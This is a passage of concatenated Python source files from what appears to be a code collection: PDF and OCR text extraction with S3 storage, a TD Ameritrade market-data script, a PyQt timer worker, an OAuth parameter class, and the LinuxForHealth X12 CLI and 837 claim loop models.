document = subprocess.check_output(self.text_args)
logging.info("%s converted to text from pdf", self.doc_path)
return document
def extract_metadata(self):
"""
Extracts metadata using Tika into a json file
"""
metadata = subprocess.check_output(self.metadata_args)
self.save(metadata.decode('utf-8'), ext='_metadata.json')
def extract(self):
"""
Converts and extracts metadata for any document type compatiable
with Tika, (http://tika.apache.org/1.7/formats.html) but does not
check if extraction produces text.
"""
self.extract_metadata()
self.save(self.doc_to_text().decode('utf-8'), ext='.txt')
class PDFTextExtraction(TextExtraction):
""" PDFTextExtraction adds OCR functionality to TextExtraction. The ORC
functionality is triggered only if a PDF document is not responsive or
if Tika fails to extract text """
def __init__(self, doc_path, tika_port=9998,
host='localhost', word_threshold=10):
super().__init__(doc_path, tika_port, host)
self.WORDS = re.compile('[A-Za-z]{3,}')
self.word_threshold = word_threshold
def meets_len_threshold(self, doc_text):
"""
Return True if number of words in text are more than the threshold
"""
if len(tuple(self.WORDS.finditer(doc_text))) > self.word_threshold:
return True
def has_text(self):
"""
Using `pdffonts` returns True if document has fonts, which in
essence means it has text. If a document is not a pdf
automatically returns True.
"""
args = ['pdffonts', self.doc_path]
pdffonts_output = subprocess.Popen(
args,
stdout=subprocess.PIPE,
)
result = None
if pdffonts_output.communicate()[0].decode("utf-8").count("\n") > 2:
result = True
retcode = pdffonts_output.returncode
if retcode:
raise subprocess.CalledProcessError(retcode, args)
if result:
return result
def cat_and_clean(self, out_file, main_text_file):
""" Concatenates file to main text file and removes individual file """
out_file = out_file + '.txt'
with open(main_text_file, 'a') as append:
with open(out_file) as source:
shutil.copyfileobj(source, append)
os.remove(out_file)
def img_to_text(self):
""" Uses Tesseract OCR to convert png image to text file """
main_text_file = self.root + '.txt'
for png in sorted(glob.glob('%s_*.png' % self.root)):
out_file = png[:-4]
args = ['tesseract', png, out_file, '-l', 'eng']
doc_process = subprocess.Popen(
args=args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
doc_process.communicate()
if doc_process.returncode:
raise subprocess.CalledProcessError(doc_process.returncode,
args)
self.cat_and_clean(out_file, main_text_file)
logging.info("%s converted to text from image", self.root + '.png')
return main_text_file
def pdf_to_img(self):
""" Converts and saves pdf file to png image using Ghostscript"""
export_path = self.root + "_%03d.png"
args = [
'gs', '-dNOPAUSE', '-dBATCH', '-sDEVICE=pnggray',
'-dINTERPOLATE', '-r300', '-dNumRenderingThreads=8',
'-sOutputFile={0}'.format(export_path), self.doc_path
]
process = subprocess.Popen(
args=args, stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
process.communicate()
if process.returncode:
raise subprocess.CalledProcessError(process.returncode, args)
logging.info("%s converted to png images", self.doc_path)
return export_path
def extract(self):
"""
Converts pdfs to text and extracts metadata. Uses OCR if the
initial attempt fails.
"""
self.extract_metadata()
needs_ocr = False
# Determine if PDF has text
if not self.has_text():
needs_ocr = True
else:
doc_text = self.doc_to_text().decode('utf-8')
# Determine if extraction suceeded
if self.meets_len_threshold(doc_text):
self.save(doc_text, ext='.txt')
else:
needs_ocr = True
if needs_ocr:
self.pdf_to_img()
self.img_to_text()
class TextExtractionS3(TextExtraction):
def __init__(self, file_key, s3_bucket, tika_port=9998, host='localhost'):
""" Connects to s3 bucket and downloads file into a temp dir
before using super to initalize like TextExtraction """
self.file_key = file_key
self.s3_bucket = s3_bucket
self.temp = tempfile.TemporaryDirectory()
doc_path = os.path.join(self.temp.name, os.path.basename(file_key))
k = Key(self.s3_bucket)
k.key = self.file_key
k.get_contents_to_filename(doc_path)
super().__init__(doc_path, tika_port, host)
def save(self, document, ext):
""" Save document to s3 """
root, old_ext = os.path.splitext(self.file_key)
s3_path = root + ext
k = Key(self.s3_bucket)
k.key = s3_path
k.set_contents_from_string(str(document))
class PDFTextExtractionS3(TextExtractionS3, PDFTextExtraction):
def __init__(self, file_key, s3_bucket, tika_port=9998, host='localhost',
word_threshold=10):
TextExtractionS3.__init__(self, file_key, s3_bucket, tika_port, host)
self.WORDS = re.compile('[A-Za-z]{3,}')
self.word_threshold = word_threshold
def img_to_text(self):
""" Extends img_to_text from PDFTextExtraction and adds a s3 save
function """
main_text_file = super().img_to_text()
local_base, text_file_name = os.path.split(main_text_file)
s3_base, s3_doc_name = os.path.split(self.file_key)
k = Key(self.s3_bucket)
k.key = os.path.join(s3_base, text_file_name)
k.set_contents_from_filename(main_text_file)
def text_extractor(doc_path, force_convert=False):
"""Checks if document has been converted and sends file to appropriate
converter"""
root, extension = os.path.splitext(doc_path)
if not os.path.exists(root + ".txt") or force_convert:
if extension == '.pdf':
extractor = PDFTextExtraction(doc_path)
else:
extractor = TextExtraction(doc_path)
extractor.extract()
def text_extractor_s3(file_key, s3_bucket, force_convert=True):
""" Checks if document has been converted in s3 bucket and and sends file
to appropriate converter"""
root, extension = os.path.splitext(file_key)
if not force_convert:
if len(list(s3_bucket.list(root + '.txt'))) > 0:
logging.info("%s has already been converted", file_key)
return
if extension == ".pdf":
extractor = PDFTextExtractionS3(file_key, s3_bucket)
else:
extractor = TextExtractionS3(file_key, s3_bucket)
logging.info("%s is being converted", file_key)
extractor.extract()
``` |
{
"source": "joe-wojniak/project_portfolio",
"score": 3
} |
#### File: joe-wojniak/project_portfolio/denali.py
```python
import os
import json
import csv
import pandas as pd
'''
# Purpose: Denali retrieves data from TD Ameritrade's API.
# Requisites:
# (1) TDAmeritrade.com account
# (2) developer.TDAmeritrade.com account
# (3) an app created on the TD Ameritrade developer account
# (4) client_id stored as an environment variable
# (5) a refresh token stored as an environment variable
# TD Ameritrade recommends a manual process for requesting a refresh token.
# Ref: TDAmeritradeOAuth2Notes2021.txt
# TD Ameritrade token server url:
# https://api.tdameritrade.com/v1/oauth2/token
# The TD Ameritrade API is the resource server that provides the protected resources when
# a valid request is received with an access token.
# TD Ameritrade resource server base url:
# https://api.tdameritrade.com/v1
'''
from sanction import Client
import time
# Background info for Sanction and its functions:
# https://sanction.readthedocs.io/en/latest/
# https://docs.python.org/2.6/library/urllib2.html
def api_pricehistory(symbol):
# Price History API
url = '/{0}/pricehistory'.format(symbol)
querystring = '?apikey={0}&period=6&frequencyType=daily&frequency=1'.format(client_id)
# url = url+querystring # querystring not used- throwing errors
# print statements are used for verbose output:
# print('constructed url with query string:')
# print(url)
headers = {'Authorization': 'Bearer {0}'.format(c.access_token)}
# print('client app constructed header:')
# print(headers)
# API requests are throttled to 120 requests / minute or 1 request every 0.5 sec
data = c.request(url=url, headers=headers)
time.sleep(0.5) # 0.5 sec delay per required API request rate <= 0.5 sec
return data
def api_chains(symbol, strikeCount, includeQuotes, strategy, interval, options_range, fromDate, toDate, expMonth):
# Option Chains API
url ='/chains'
querystring= '?apikey={0}&symbol={1}&strikeCount={2}&includeQuotes={3}&strategy={4}&interval={5}&range={6}\
&fromDate={7}&toDate={8}&expMonth={9}'.format(client_id, symbol, strikeCount, includeQuotes, strategy, interval,\
options_range, fromDate, toDate, expMonth)
url = url+querystring
headers = {'Authorization': 'Bearer {0}'.format(c.access_token)}
# API requests are throttled to 120 requests / minute or 1 request every 0.5 sec
data = c.request(url=url, headers=headers)
time.sleep(0.5) # 0.5 sec delay per required API request rate <= 0.5 sec
return data
def dict2json(data:dict, filename:str):
with open(filename, "w") as f:
json.dump(data, f)
f.close()
return
# Define credentials
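# The two environment variables read below must be set beforehand, e.g.
# (values are placeholders):
#   export autoTrader=YOUR_API_KEY
#   export autoTraderToken=YOUR_REFRESH_TOKEN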
client_id = os.environ.get('autoTrader') # api key
client_secret = os.environ.get('autoTraderToken') # refresh token
redirect_uri = 'https://api.tdameritrade.com/v1/oauth2/token' # redirect uri - required for access token request
token_url = 'https://api.tdameritrade.com/v1/oauth2/token' # token url - issues access tokens
base_url = 'https://api.tdameritrade.com/v1/marketdata'
# Instantiate a client to request an access token
# this requires a previously issued refresh token
# stored as an environment variable, e.g. client_secret = os.environ.get('autoTraderToken')
c = Client(token_endpoint=token_url, resource_endpoint=base_url, client_id=client_id, \
client_secret=client_secret)
# Request an access token
# Requests are throttled to 120 requests / minute or 1 request every 0.5 sec
# Excessive token requests will be discouraged by TD Ameritrade - i.e. rate limiting by IP address, etc.
c.request_token(grant_type='refresh_token', refresh_token=client_secret, redirect_uri=redirect_uri)
# Price History API Request
# ref for stocks: https://www.barchart.com/stocks/most-active/price-volume-leaders
symbol = 'SPY'
data1 = api_pricehistory(symbol)
dict2json(data1, "price_history.json")
# Options Chain API Request
# ref for options symbols: https://www.barchart.com/options/most-active/stocks
# ref for API https://developer.tdameritrade.com/option-chains/apis/get/marketdata/chains
symbol = 'SPY'
strikeCount = 10
includeQuotes = True
strategy = 'ANALYTICAL'
interval = 3
options_range = 'ALL'
fromDate = '2021-03-31'
toDate = '2021-05-01'
expMonth = 'APR'
data2 = api_chains(symbol, strikeCount, includeQuotes, strategy, interval, options_range, fromDate, toDate, expMonth)
dict2json(data2, "opt_chain.json")
``` |
{
"source": "JoeWolf92/DMD-PyCalibration",
"score": 3
} |
#### File: JoeWolf92/DMD-PyCalibration/worker.py
```python
from PyQt5.QtCore import QThread, QObject, pyqtSignal, pyqtSlot
import time
class Worker(QObject):
finished = pyqtSignal()
statusCheckDMDTimer = pyqtSignal()
@pyqtSlot()
def procCounter(self): # A slot takes no params
while True:
time.sleep(30)
self.statusCheckDMDTimer.emit()
self.finished.emit()
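# Typical wiring from the GUI side (a sketch; every name other than Worker and
# its signals is assumed):
#
#   thread = QThread()
#   worker = Worker()
#   worker.moveToThread(thread)
#   thread.started.connect(worker.procCounter)
#   worker.statusCheckDMDTimer.connect(on_status_check)  # slot provided by the caller
#   worker.finished.connect(thread.quit)
#   thread.start()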
``` |
{
"source": "joewood/ipyauth",
"score": 2
} |
#### File: ipyauth/ipyauth_widget/_params_sgconnect.py
```python
import json
from copy import deepcopy as copy
from traitlets import HasTraits, Unicode, validate, TraitError
from ._util import Util
class ParamsSgConnect(HasTraits):
"""
"""
name = Unicode()
response_type = Unicode()
domain = Unicode()
client_id = Unicode()
redirect_uri = Unicode()
audience = Unicode()
scope = Unicode()
def __init__(self,
mode='PRD', # PRD or HOM
response_type=None,
client_id=None,
redirect_uri=None,
scope=None,
dotenv_folder='.',
dotenv_file=None,
):
"""
"""
name = 'sgconnect' + mode
dic = Util.load_dotenv(dotenv_folder,
dotenv_file,
name)
for k, v in dic.items():
setattr(self, k, v)
self.name = name
# overrides
if response_type:
self.response_type = response_type
if client_id:
self.client_id = client_id
if redirect_uri:
self.redirect_uri = redirect_uri
self.scope = self.build_scope(scope)
self.data = self.build_data()
def to_dict(self):
"""
"""
d = copy(self.__dict__)
d = {k: v for k, v in d.items() if v is not None}
return d
def __repr__(self):
"""
"""
return json.dumps(self.data, sort_keys=False, indent=2)
    @validate('name')
    def _valid_name(self, proposal):
        """
        """
        value = proposal['value']
        if value not in ('sgconnectPRD', 'sgconnectHOM'):
            raise TraitError('mode must be "PRD" (default) or "HOM" (aka UAT)')
        return value
@validate('response_type')
def _valid_response_type(self, proposal):
"""
"""
elmts = proposal['value'].split(' ')
if not 'id_token' in elmts:
raise TraitError('response_type must be contain "id_token"')
if not 'token' in elmts:
raise TraitError('response_type must be contain "token"')
return proposal['value']
@validate('redirect_uri')
def _valid_redirect_uri(self, proposal):
"""
"""
if not Util.is_url(proposal['value']):
raise TraitError('redirect_uri must be a url')
return proposal['value']
@validate('scope')
def _valid_scope(self, proposal):
"""
"""
elmts = proposal['value'].split(' ')
        if 'profile' not in elmts or 'openid' not in elmts:
            raise TraitError('scope must contain "profile" and "openid"')
return proposal['value']
def build_scope(self, scope):
"""
"""
scopes = [e.strip() for e in scope.split(' ')] + ['openid', 'profile']
return ' '.join(list(set(scopes)))
def build_data(self):
"""
"""
props_params = ['name',
]
props_url_params = ['response_type',
'client_id',
'redirect_uri',
'audience',
'scope',
]
data = {}
for k in props_params:
v = getattr(self, k)
if v != '':
data[k] = v
data_url = {}
for k in props_url_params:
v = getattr(self, k)
if v != '':
data_url[k] = v
data['url_params'] = data_url
return data
``` |
{
"source": "joewright/x12",
"score": 3
} |
#### File: linuxforhealth/x12/cli.py
```python
import argparse
import json
from .encoding import X12JsonEncoder
from .io import X12SegmentReader, X12ModelReader
from typing import List
CLI_DESCRIPTION = """
The LinuxForHealth X12 CLI parses and validates X12 messages.
Messages are returned in JSON format in either a segment or transactional format.
"""
def _create_arg_parser():
"""
Creates the Argument Parser for the CLI utility.
:return: ArgumentParser
"""
parser = argparse.ArgumentParser(
prog="LinuxForHealth X12",
description=CLI_DESCRIPTION,
formatter_class=argparse.RawTextHelpFormatter,
)
mode_group = parser.add_mutually_exclusive_group()
mode_group.add_argument(
"-s", "--segment", help="Returns X12 segments", action="store_true"
)
mode_group.add_argument(
"-m", "--model", help="Returns X12 models", action="store_true"
)
parser.add_argument(
"-x",
"--exclude",
help="Exclude fields set to None in model output",
action="store_true",
)
parser.add_argument(
"-p", "--pretty", help="Pretty print output", action="store_true"
)
parser.add_argument(
"-d",
"--delimiters",
help="Include X12 delimiters in output. Only valid when -m (model mode) is used",
action="store_true",
)
parser.add_argument("file", help="The path to a ASC X12 file")
return parser
def _parse_segments(file_path: str) -> List:
"""
Parses X12 segments from an input file.
:param file_path: The path to the X12 file.
:return: List of X12 segments
"""
with X12SegmentReader(file_path) as r:
segments = []
for segment_name, segment in r.segments():
segment_data = {
f"{segment_name}{str(i).zfill(2)}": v for i, v in enumerate(segment)
}
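            # keys combine the segment name with a zero-padded element index,
            # e.g. an NM1 segment produces "NM100", "NM101", "NM102", ...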
segments.append(segment_data)
return segments
def _parse_models(
file_path: str, exclude_none: bool = False, output_delimiters: bool = False
) -> List:
"""
Parses a X12 segment model from a X12 input file.
:param file_path: The path to the X12 file.
:param exclude_none: Excludes fields set to None from the model output.
:param output_delimiters: When True delimiter metadata is included with each segment.
:return: List of X12 models
"""
with X12ModelReader(file_path, output_delimiters=output_delimiters) as r:
# if field is not set it will be omitted
# fields explicitly set to None will be included if exclude_none is True
export_params = {
"exclude_unset": True,
"exclude_none": exclude_none,
}
models = []
for m in r.models():
model_data = m.dict(**export_params)
models.append(model_data)
return models
def main():
"""
CLI module entrypoint
"""
parser = _create_arg_parser()
args = parser.parse_args()
if args.segment and args.delimiters:
parser.error("-s (segment mode) does not support -d (output delimiters)")
if args.segment:
x12_data = _parse_segments(args.file)
else:
x12_data = _parse_models(args.file, args.exclude, args.delimiters)
json_opts = {"cls": X12JsonEncoder}
if args.pretty:
json_opts["indent"] = 4
x12_json = json.dumps(x12_data, **json_opts)
print(x12_json)
```
#### File: v4010/x12_837_004010X098A1/loops.py
```python
from decimal import Decimal
from linuxforhealth.x12.models import X12SegmentGroup
from .segments import (
HeaderStSegment,
HeaderBhtSegment,
HeaderRefSegment,
Loop1000ANm1Segment,
Loop1000APerSegment,
Loop1000BNm1Segment,
Loop2000AHlSegment,
Loop2000APrvSegment,
Loop2010AaNm1Segment,
Loop2010AaRefSegment,
Loop2010AbNm1Segment,
Loop2010AbRefSegment,
Loop2000BHlSegment,
Loop2000BSbrSegment,
Loop2010BaNm1Segment,
Loop2010BaRefSegment,
Loop2010BbNm1Segment,
Loop2010BbRefSegment,
Loop2010BcNm1Segment,
Loop2010BdNm1Segment,
Loop2010BdRefSegment,
Loop2300DtpSegment,
Loop2300PwkSegment,
Loop2300Cn1Segment,
Loop2300AmtSegment,
Loop2300RefSegment,
Loop2300NteSegment,
Loop2300CrcSegment,
Loop2000CHlSegment,
Loop2000CPatSegment,
Loop2010CaNm1Segment,
Loop2010CaRefSegment,
Loop2305Cr7Segment,
Loop2305HsdSegment,
Loop2310ANm1Segment,
Loop2310APrvSegment,
Loop2310ARefSegment,
Loop2310BNm1Segment,
Loop2310BPrvSegment,
Loop2310BRefSegment,
Loop2310CNm1Segment,
Loop2310CRefSegment,
Loop2310DNm1Segment,
Loop2310DRefSegment,
Loop2310ENm1Segment,
Loop2310ERefSegment,
Loop2320SbrSegment,
Loop2320AmtSegment,
Loop2330aNm1Segment,
Loop2330aRefSegment,
Loop2330bNm1Segment,
Loop2330BPerSegment,
Loop2330BDtpSegment,
Loop2300BRefSegment,
Loop2330cNm1Segment,
Loop2330cRefSegment,
Loop2330dNm1Segment,
Loop2330dRefSegment,
Loop2330eNm1Segment,
Loop2330eRefSegment,
Loop2330fNm1Segment,
Loop2330fRefSegment,
Loop2330gNm1Segment,
Loop2330gRefSegment,
Loop2330HNm1Segment,
Loop2330HRefSegment,
Loop2400PwkSegment,
Loop2400CrcSegment,
Loop2400DtpSegment,
Loop2400Cn1Segment,
Loop2400RefSegment,
Loop2400AmtSegment,
Loop2400NteSegment,
Loop2410RefSegment,
Loop2420ANm1Segment,
Loop2420APrvSegment,
Loop2420ARefSegment,
Loop2420BNm1Segment,
Loop2420BRefSegment,
Loop2420CNm1Segment,
Loop2420CRefSegment,
Loop2420DNm1Segment,
Loop2420DRefSegment,
Loop2420ENm1Segment,
Loop2420ERefSegment,
Loop2420EPerSegment,
Loop2420FNm1Segment,
Loop2420FPrvSegment,
Loop2420FRefSegment,
Loop2420GNm1Segment,
Loop2420GRefSegment,
Loop2430DtpSegment,
Loop2010AaPerSegment,
)
from linuxforhealth.x12.v4010.segments import (
SeSegment,
CurSegment,
N3Segment,
N4Segment,
PatSegment,
DmgSegment,
ClmSegment,
K3Segment,
Cr1Segment,
Cr2Segment,
HiSegment,
CasSegment,
OiSegment,
MoaSegment,
LxSegment,
Sv1Segment,
Sv5Segment,
Cr3Segment,
Cr5Segment,
MeaSegment,
Ps1Segment,
HcpSegment,
LinSegment,
CtpSegment,
SvdSegment,
LqSegment,
FrmSegment,
)
from typing import List, Optional, Dict
from pydantic import Field, root_validator
from linuxforhealth.x12.validators import (
validate_duplicate_date_qualifiers,
validate_duplicate_amt_codes,
)
class Loop1000A(X12SegmentGroup):
"""
Loop 1000A - Submitter Name
"""
nm1_segment: Loop1000ANm1Segment
per_segment: List[Loop1000APerSegment] = Field(min_items=1, max_items=2)
class Loop1000B(X12SegmentGroup):
"""
Loop 1000B - Receiver Name
"""
nm1_segment: Loop1000BNm1Segment
class Loop2010Aa(X12SegmentGroup):
"""
Loop 2010AA - Billing Provider Name
"""
nm1_segment: Loop2010AaNm1Segment
n3_segment: N3Segment
n4_segment: N4Segment
ref_segment: Optional[List[Loop2010AaRefSegment]] = Field(max_items=16)
per_segment: Optional[List[Loop2010AaPerSegment]] = Field(max_items=2)
class Loop2010Ab(X12SegmentGroup):
"""
Loop 2010AB - Pay to Provider Name
"""
nm1_segment: Loop2010AbNm1Segment
n3_segment: N3Segment
n4_segment: N4Segment
ref_segment: Optional[List[Loop2010AbRefSegment]] = Field(max_items=5)
class Loop2010Ba(X12SegmentGroup):
"""
Loop 2010BA - Subscriber Name
"""
nm1_segment: Loop2010BaNm1Segment
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
dmg_segment: Optional[DmgSegment]
ref_segment: Optional[List[Loop2010BaRefSegment]] = Field(max_items=5)
class Loop2010Bb(X12SegmentGroup):
"""
Loop 2010Bb - Payer Name
"""
nm1_segment: Loop2010BbNm1Segment
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
ref_segment: Optional[List[Loop2010BbRefSegment]]
class Loop2010Bc(X12SegmentGroup):
"""
Loop 2010Bc - Responsible Party Name
"""
nm1_segment: Loop2010BcNm1Segment
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
class Loop2010Bd(X12SegmentGroup):
"""
Credit/Debit Card Holder Name
"""
nm1_segment: Loop2010BdNm1Segment
ref_segment: Optional[List[Loop2010BdRefSegment]] = Field(max_items=2)
class Loop2305(X12SegmentGroup):
"""
Home Health Care Plan Information
"""
cr7_segment: Loop2305Cr7Segment
hsd_segment: Optional[List[Loop2305HsdSegment]] = Field(max_items=3)
class Loop2330H(X12SegmentGroup):
"""
Claim - Other Subscriber Other Payer Supervising Provider
"""
nm1_segment: Loop2330HNm1Segment
ref_segment: List[Loop2330HRefSegment] = Field(min_items=1, max_items=3)
class Loop2330G(X12SegmentGroup):
"""
Claim - Other Subscriber Other Payer Billing Provider
"""
nm1_segment: Loop2330gNm1Segment
ref_segment: List[Loop2330gRefSegment] = Field(min_items=1, max_items=3)
class Loop2330F(X12SegmentGroup):
"""
Claim - Other Subscriber Other Payer Purchased Service Provider
"""
nm1_segment: Loop2330fNm1Segment
ref_segment: List[Loop2330fRefSegment] = Field(min_items=1, max_items=3)
class Loop2330E(X12SegmentGroup):
"""
Claim - Other Subscriber Other Payer Rendering Provider
"""
nm1_segment: Loop2330eNm1Segment
ref_segment: List[Loop2330eRefSegment] = Field(min_items=1, max_items=3)
class Loop2330D(X12SegmentGroup):
"""
Claim - Other Subscriber Other Payer Referring Provider
"""
nm1_segment: Loop2330dNm1Segment
ref_segment: List[Loop2330dRefSegment] = Field(min_items=1, max_items=3)
class Loop2330C(X12SegmentGroup):
"""
Claim - Other Subscriber Other Payer Patient Information
"""
nm1_segment: Loop2330cNm1Segment
ref_segment: List[Loop2330cRefSegment] = Field(min_items=1, max_items=3)
class Loop2330B(X12SegmentGroup):
"""
Claim - Other Payer Name
"""
nm1_segment: Loop2330bNm1Segment
per_segment: Optional[List[Loop2330BPerSegment]] = Field(max_items=2)
dtp_segment: Optional[Loop2330BDtpSegment]
ref_segment: Optional[List[Loop2300BRefSegment]] = Field(max_items=6)
class Loop2330A(X12SegmentGroup):
"""
Claim - Other Subscriber Name
"""
nm1_segment: Loop2330aNm1Segment
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
ref_segment: Optional[List[Loop2330aRefSegment]] = Field(max_items=3)
class Loop2320(X12SegmentGroup):
"""
Claim Other subscriber information
"""
sbr_segment: Loop2320SbrSegment
cas_segment: Optional[List[CasSegment]] = Field(min_items=0, max_items=5)
amt_segment: Optional[List[Loop2320AmtSegment]] = Field(min_items=0, max_items=8)
oi_segment: Optional[OiSegment]
moa_segment: Optional[MoaSegment]
loop_2330a: Optional[Loop2330A]
loop_2330b: Optional[Loop2330B]
loop_2330c: Optional[List[Loop2330C]]
loop_2330d: Optional[Loop2330D]
loop_2330e: Optional[Loop2330E]
loop_2330f: Optional[Loop2330F]
loop_2330g: Optional[Loop2330G]
loop_2330h: Optional[Loop2330H]
_validate_amt_segments = root_validator(allow_reuse=True)(
validate_duplicate_amt_codes
)
class Loop2310E(X12SegmentGroup):
"""
Supervising Provider Name
"""
nm1_segment: Loop2310ENm1Segment
ref_segment: Optional[List[Loop2310ERefSegment]] = Field(max_items=5)
class Loop2310D(X12SegmentGroup):
"""
Service Facility Location
"""
nm1_segment: Loop2310DNm1Segment
n3_segment: N3Segment
n4_segment: N4Segment
ref_segment: Optional[List[Loop2310DRefSegment]]
class Loop2310C(X12SegmentGroup):
"""
Purchased Service Provider Name
"""
nm1_segment: Optional[Loop2310CNm1Segment]
ref_segment: Optional[List[Loop2310CRefSegment]] = Field(max_items=3)
class Loop2310B(X12SegmentGroup):
"""
Claim Rendering Provider
"""
nm1_segment: Loop2310BNm1Segment
prv_segment: Optional[Loop2310BPrvSegment]
ref_segment: Optional[List[Loop2310BRefSegment]] = Field(max_items=4)
class Loop2310A(X12SegmentGroup):
"""
Claim Referring Provider
"""
nm1_segment: Loop2310ANm1Segment
prv_segment: Loop2310APrvSegment
ref_segment: Optional[List[Loop2310ARefSegment]] = Field(max_items=5)
class Loop2440(X12SegmentGroup):
"""
Form Identification Code
"""
lq_segment: LqSegment
frm_segment: List[FrmSegment] = Field(min_items=1, max_items=99)
class Loop2430(X12SegmentGroup):
"""
Claim Service Line - Adjudication Information
"""
svd_segment: SvdSegment
cas_segment: Optional[List[CasSegment]]
dtp_segment: Loop2430DtpSegment
class Loop2420G(X12SegmentGroup):
"""
Claim Service Line - Other Payer Prior Auth
"""
nm1_segment: Loop2420GNm1Segment
ref_segment: List[Loop2420GRefSegment] = Field(min_items=1, max_items=2)
class Loop2420F(X12SegmentGroup):
"""
Claim Service Line - Referring Provider Name
"""
nm1_segment: Loop2420FNm1Segment
prv_segment: Optional[Loop2420FPrvSegment]
ref_segment: Optional[List[Loop2420FRefSegment]] = Field(max_items=5)
class Loop2420E(X12SegmentGroup):
"""
Claim Service Line - Ordering Provider Name
"""
nm1_segment: Loop2420ENm1Segment
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
ref_segment: Optional[List[Loop2420ERefSegment]] = Field(max_items=5)
per_segment: Optional[Loop2420EPerSegment]
class Loop2420D(X12SegmentGroup):
"""
Claim Service Line - Supervising Provider Name
"""
nm1_segment: Loop2420DNm1Segment
ref_segment: Optional[List[Loop2420DRefSegment]] = Field(max_items=5)
class Loop2420C(X12SegmentGroup):
"""
Claim Service Line - Service Facility Location Name
"""
nm1_segment: Loop2420CNm1Segment
n3_segment: N3Segment
n4_segment: N4Segment
ref_segment: Optional[List[Loop2420CRefSegment]] = Field(max_items=5)
class Loop2420B(X12SegmentGroup):
"""
Claim Service Line - Purchased Service Provider
"""
nm1_segment: Loop2420BNm1Segment
ref_segment: Optional[List[Loop2420BRefSegment]] = Field(max_items=5)
class Loop2420A(X12SegmentGroup):
"""
Claim Service Line - Rendering Provider
"""
nm1_segment: Loop2420ANm1Segment
prv_segment: Optional[Loop2420APrvSegment]
ref_segment: Optional[List[Loop2420ARefSegment]] = Field(max_items=5)
class Loop2410(X12SegmentGroup):
"""
Claim Service Line - Drug Identification
"""
lin_segment: LinSegment
ctp_segment: CtpSegment
ref_segment: Optional[Loop2410RefSegment]
class Loop2400(X12SegmentGroup):
"""
Claim - Service Line
"""
lx_segment: LxSegment
sv1_segment: Sv1Segment
sv5_segment: Optional[Sv5Segment]
pwk_segment: Optional[List[Loop2400PwkSegment]] = Field(min_items=0, max_items=10)
cr1_segment: Optional[Cr1Segment]
cr2_segment: Optional[List[Cr2Segment]] = Field(max_items=5)
cr3_segment: Optional[Cr3Segment]
cr5_segment: Optional[Cr5Segment]
crc_segment: Optional[List[Loop2400CrcSegment]] = Field(max_items=10)
dtp_segment: List[Loop2400DtpSegment] = Field(min_items=1, max_items=20)
mea_segment: Optional[List[MeaSegment]] = Field(max_items=20)
cn1_segment: Optional[Loop2400Cn1Segment]
ref_segment: Optional[List[Loop2400RefSegment]] = Field(max_items=15)
amt_segment: Optional[List[Loop2400AmtSegment]] = Field(max_items=3)
k3_segment: Optional[List[K3Segment]] = Field(max_items=10)
nte_segment: Optional[Loop2400NteSegment]
ps1_segment: Optional[Ps1Segment]
hsd_segment: Optional[Loop2305HsdSegment] # reusing segment
hcp_segment: Optional[HcpSegment]
loop_2410: Optional[Loop2410]
loop_2420a: Optional[Loop2420A]
loop_2420b: Optional[Loop2420B]
loop_2420c: Optional[Loop2420C]
loop_2420d: Optional[Loop2420D]
loop_2420e: Optional[Loop2420E]
loop_2420f: Optional[Loop2420F]
loop_2420g: Optional[Loop2420G]
loop_2430: Optional[List[Loop2430]]
loop_2440: Optional[List[Loop2440]]
_validate_dtp_qualifiers = root_validator(allow_reuse=True)(
validate_duplicate_date_qualifiers
)
class Loop2300(X12SegmentGroup):
"""
Loop 2300 - Claims
"""
clm_segment: ClmSegment
dtp_segment: Optional[List[Loop2300DtpSegment]] = Field(min_items=0, max_items=17)
pwk_segment: Optional[List[Loop2300PwkSegment]] = Field(min_items=0, max_items=10)
cn1_segment: Optional[Loop2300Cn1Segment]
amt_segment: Optional[List[Loop2300AmtSegment]] = Field(max_items=3)
ref_segment: Optional[List[Loop2300RefSegment]] = Field(min_items=0, max_items=14)
k3_segment: Optional[List[K3Segment]] = Field(min_items=0, max_items=10)
nte_segment: Optional[Loop2300NteSegment]
cr1_segment: Optional[Cr1Segment]
cr2_segment: Optional[Cr2Segment]
crc_segment: Optional[List[Loop2300CrcSegment]] = Field(min_items=0, max_items=8)
hi_segment: Optional[List[HiSegment]] = Field(min_items=1, max_items=4)
hcp_segment: Optional[HcpSegment]
loop_2305: Optional[Loop2305]
loop_2310a: Optional[Loop2310A]
loop_2310b: Optional[Loop2310B]
loop_2310c: Optional[Loop2310C]
loop_2310d: Optional[Loop2310D]
loop_2310e: Optional[Loop2310E]
loop_2320: Optional[List[Loop2320]] = Field(min_items=0, max_items=10)
loop_2400: List[Loop2400] = Field(min_items=1, max_items=50)
_validate_dtp_qualifiers = root_validator(allow_reuse=True)(
validate_duplicate_date_qualifiers
)
@root_validator
def validate_claim_amounts(cls, values: Dict):
"""
Validates that CLM02 == SUM(Loop2400.SV102)
"""
claim_amount: Decimal = values.get("clm_segment").total_claim_charge_amount
line_total: Decimal = Decimal("0.0")
for line in values.get("loop_2400", []):
line_total += line.sv1_segment.line_item_charge_amount
if claim_amount != line_total:
raise ValueError(
f"Claim Amount {claim_amount} != Service Line Total {line_total}"
)
return values
class Loop2010Ca(X12SegmentGroup):
"""
Loop 2010CA Patient Name
"""
nm1_segment: Loop2010CaNm1Segment
n3_segment: N3Segment
n4_segment: N4Segment
dmg_segment: DmgSegment
ref_segment: Optional[List[Loop2010CaRefSegment]] = Field(max_items=6)
class Loop2000C(X12SegmentGroup):
"""
Loop 2000C - Patient
"""
hl_segment: Loop2000CHlSegment
pat_segment: Loop2000CPatSegment
loop_2010ca: Loop2010Ca
loop_2300: Optional[List[Loop2300]] = Field(min_items=0, max_items=100)
class Loop2000B(X12SegmentGroup):
"""
Loop 2000B - Subscriber
"""
hl_segment: Loop2000BHlSegment
sbr_segment: Loop2000BSbrSegment
pat_segment: Optional[PatSegment]
loop_2010ba: Loop2010Ba
loop_2010bb: Loop2010Bb
loop_2010bc: Optional[Loop2010Bc]
loop_2010bd: Optional[Loop2010Bd]
loop_2300: Optional[List[Loop2300]] = Field(min_items=0, max_items=100)
loop_2000c: Optional[List[Loop2000C]]
class Loop2000A(X12SegmentGroup):
"""
